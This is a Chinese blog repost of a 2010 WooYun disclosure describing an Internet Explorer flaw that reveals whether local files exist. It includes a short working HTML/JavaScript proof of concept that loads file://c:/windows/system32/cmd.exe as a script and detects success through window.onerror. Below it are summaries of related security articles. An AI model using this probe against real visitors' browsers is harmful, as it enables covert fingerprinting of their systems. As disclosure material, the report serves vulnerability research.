微软IE本地文件探测漏洞

最新推荐文章于 2025-12-17 15:06:21 发布

原创最新推荐文章于 2025-12-17 15:06:21 发布 · 4.1k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#web安全 #网络安全 #安全 #hack #wooyun

漏洞详情

披露状态：

2010-08-02：积极联系厂商并且等待厂商认领中，细节不对外公开
2010-08-02：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

微软ie在处理对本地文件请求时存在一些问题，可以用来探测本地文件是否存在，忽忽

详细说明：

非res协议哦！

漏洞证明：

<script>
window.onerror=function(){
alert('文件存在');
return true;
}
</script>
<script src="file://c:/windows/system32/cmd.exe"></script>

修复方案：

让别人去想吧~

版权声明：转载请注明来源结界师@乌云

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sword-heart

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

文件上传漏洞进阶

悦分享

07-30

247

文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的，有时候几乎没有什么技术门槛。在互联网中，我们经常用到文件上传功能，比如上传一张自定义的图片；分享一段视频或者照片；论坛发帖时附带一个附件；在发送邮件时附带附件，等等。文件上传功能本身是一个正常业务需求，对于网站来说，很多时候也确实需要用户将文件上传到服务器。所以“文件上传”本身没有问题，但有问题的是文件上传后，服务器怎么处理、解释文件。

信息收集及漏洞利用--安全（四）

qq_43371350的博客

04-03

3338

信息收集收集目标web服务器的网络信息、系统信息、组织信息网络信息包括：域名、TCP/UDP的端口、网络协议、防火墙、访问控制策略等系统信息包括：系统标识、站点目录、系统架构、路由表、测试/临时文件组织信息包括：员工信息、邮箱/电话、公司地址、组织网站、组织背景等 whois信息收集注册人、电话、邮箱、dns、地址等 whois 信息 whois.chinaz.com , wwww...

参与评论您还未登录，请先登录后发表或查看评论

微软IE本地文件读取漏洞

swordheart的博客

04-20

4210

漏洞详情披露状态： 2010-08-02：积极联系厂商并且等待厂商认领中，细节不对外公开 2010-08-02：厂商已经主动忽略漏洞，细节向公众公开简要描述：微软IE在处理本地文件的访问时存在一些问题，结合微软windows的特性可能可以读取本地的某些特殊文件，可能有其他利用。详细说明：作为浏览器不可避免的要处理跨域的资源访问的问题，那么一些本身必须允许跨域的标签如iframe，script，style，而这些标签又允许解析某些格式的文件，如符合javascript语法的文件，符合

利用HTTP协议和IE的漏洞在其他计算机上运行一个程序

oRbIt 的专栏

11-05

6353

作者：星轨（oRbIt） E_Mail：inte2000@163.com 输入您的搜索字词提交搜索表单我们每天都使用网络浏览五彩缤纷、动感十足的网页，查询需要的信息

【2024版】最新6款漏洞扫描工具来了！（附下载）看完这一篇就够了

热门推荐

2401_84466316的博客

05-09

1万+

Acunetix Web Vulnerability Scanner（简称AWVS）是一款知名的网络漏洞扫描工具，它通过网络爬虫测试你的网站安全，检测流行安全漏洞，它的官方网站是：https://www.acunetix.com，我刚才看了一眼没有找到试用版下载链接，之前是有的，可以免费试用14天，当然你也可以去网上搜索破解版进行下载安装，有经济实力的朋友可以考虑购买正版软件，下图就是AWVS的主界面，里边还保存着我扫描过的两个站点，发现了4个高危漏洞，4个中危漏洞和20个低危漏洞。Fofa网络安全测绘。

漏洞检测的几种方法

键盘的起始页

07-16

6641

系统安全漏洞，也可以称为系统脆弱性，是指计算机系统在硬件、软件、协议的设计、具体实现以及系统安全策略上存在的缺陷和不足。系统脆弱性是相对系统安全而言的，从广义的角度来看，一切可能导致系统安全性受影响或破坏的因素都可以视为系统安全漏洞。安全漏洞的存在，使得非法用户可以利用这些漏洞获得某些系统权限，进而对系统执行非法操作，导致安全事件的发生。漏洞检测就是希望能够防患于未然，在漏洞被利用之前发现漏洞并修补漏洞。本文作者通过自己的实践，介绍了检测漏洞的几种方法。　　漏洞检测可以分为对已知漏洞的检测和对未知漏洞的

[ 漏洞复现篇] IE浏览器远程代码执行漏洞(CVE-2018-8174)复现

qq_51577576的博客

05-09

687

漏洞编号 CVE-2018-8174 漏洞介绍：在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告，文中提到了cve-2018-8174这个漏洞的首次在apt方面的应用。 CVE-2018-8174这个漏洞是针对IE浏览器的一个远程代码执行漏洞，是Windows VBScript Engine 代码执行漏洞，由于VBScript脚本执行引擎（vbscript.dll）存在代码执行漏洞，攻击者可以将恶意的VBScript嵌入到office文件或者网站中，一旦用户不小心点击，远程攻击者可以获取

安全漏洞探测实验

lalalalala~~

10-27

1435

安全漏洞简介定义所谓的漏洞，指的是硬件、软件或策略上的缺陷，被不法者利用，通过网络植入木马、病毒等方式来攻击或控制整个电脑，窃取您电脑中的重要资料和信息，甚至破坏您的系统。在不同种类的软、硬件设备，同种设备的不同版本之间，由不同设备构成的不同系统之间，以及同种系统在不同的设置条件下，都会存在各自不同的安全漏洞问题。漏洞会影响到的范围很大，包括系统本身及其支撑软件，网络客户和服务器软件，网络路由器和安全防火墙等。换而言之，在这些不同的软硬件设备中都可能存在不同的安全漏洞问题。在不同种类的软、硬件设备，

「第八章」文件上传漏洞

hacckjacking

01-22

3447

「第三篇」服务器端应用安全批注 [……] 表示他人、自己、网络批注参考资料来源于 * 书中批注 * 优快云 * GitHub * Google * 维基百科 * YouTube * MDN Web Docs ...

红队专题-漏洞挖掘-代码审计

aming小老弟

03-11

1585

其中 Web A 为存在 CSRF 漏洞的网站，Web B 为攻击者构建的恶意网站，User C 为 Web A 网站的合法用户。用户 C 打开浏览器，访问受信任网站 A，输入用户名和密码请求登录网站A在用户信息通过验证后，网站 A 产生 Cookie 信息并返回给浏览器，此时用户登录网站 A 成功，可以正常发送请求到网站A用户未退出网站 A 之前，在同一浏览器中，打开一个 TAB 页访问网站 B网站 B 接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点 A。

Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等

weixin_46280935的博客

09-10

6537

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合文章/书籍/教程相关说明请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏

windows server 2003 系统提权

ClearLove的博客

08-09

5416

《系统提权》作业课程名称：《系统提权》【要求】对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试；对MS03_026漏洞开启远程桌面服务；操作过程可自由发挥；概念越详细越好；渗透和验证过程必要有截图和文字说明；其余部分均可配文字简介叙述；作业模板...

漏洞又叒叕来了？！赶紧用上这些开源漏洞检测工具

weixin_34249367的博客

07-03

1677

2019独角兽企业重金招聘Python工程师标准>>> ...

渗透测试行业术语扫盲（第六篇）—— Web安全专用类术语

qq_39241682的博客

12-09

888

Web是渗透测试的主战场。要在此作战，不仅要懂攻击漏洞（如上一篇所述），更要理解支撑Web运行的基础身份机制、浏览器安全规则以及攻防双方使用的具体工具与载荷。本篇将深入Web安全的“皮下组织”，从维持登录状态的Cookie，到攻击者留下的Webshell，再到防御者的CSP策略，为你揭示这个战场的完整规则与装备图景。

【Web安全】SSRF

qinjilll的博客

12-12

957

SSRF漏洞分析与防御 SSRF(服务器端请求伪造)是一种由服务端发起恶意请求的安全漏洞，允许攻击者访问与服务器相连的内网系统。漏洞成因主要是服务端未对目标地址进行过滤限制，常见于社交分享、在线翻译、图片加载等功能点。漏洞利用方式包括：探测内网存活主机和开放端口利用file协议读取本地敏感文件访问内网未授权服务(如Redis、MySQL) 结合其他漏洞实现命令执行防御措施：白名单限制：仅允许访问可信域名/IP和协议输入校验：过滤特殊字符，校验IP归属内网服务加固：禁用未授权访问，设置强密码

【要闻周报】网络安全与数据合规 12-13

专注于制造仓库、生产线边仓、物流仓储等人工拆零拣选辅助系统以及前沿技术。

12-13

613

十部门联合发布《关于推动物流数据开放互联有效降低全社会物流成本的实施方案》、网信部门从严整治利用AI仿冒公众人物开展直播营销问题乱象、工信部通报39款App（SDK）存在侵害用户权益行为、某科技公司因未及时修复安全漏洞被网警依法处罚、北京拟将自贸区数据出境负面清单推广应用到北京全市、欧盟：EDPS发布《AI风险管理指南》、中国香港：PCPD完成对两间教育机构个人资料系统的视察

PolarCTF网络安全2025冬季个人挑战赛 wp

lpppp小公主的博客

12-09

990

PolarCTF网络安全2025冬季个人挑战赛复现

基于图神经网络+大模型的网络安全APT检测系统：从流量日志到攻击链溯源的实战落地

qq_74383080的博客

12-16

576

本文提出了一种基于图神经网络(GNN)和大型语言模型(LLM)的高级持续性威胁(APT)检测系统。该系统通过构建"主机-进程-网络"异构图，利用GraphSAGE识别异常行为模式，并结合LogsBERT进行语义分析，最后通过LLM生成攻击链报告。实际部署结果显示，该系统将APT检出率从传统方法的15%提升至97.3%，误报率从120次/天降至3次/天，攻击溯源时间从8小时缩短至25分钟。

汽车嵌入式系统网络安全风险缓解方案：AI驱动入侵检测与安全通信协议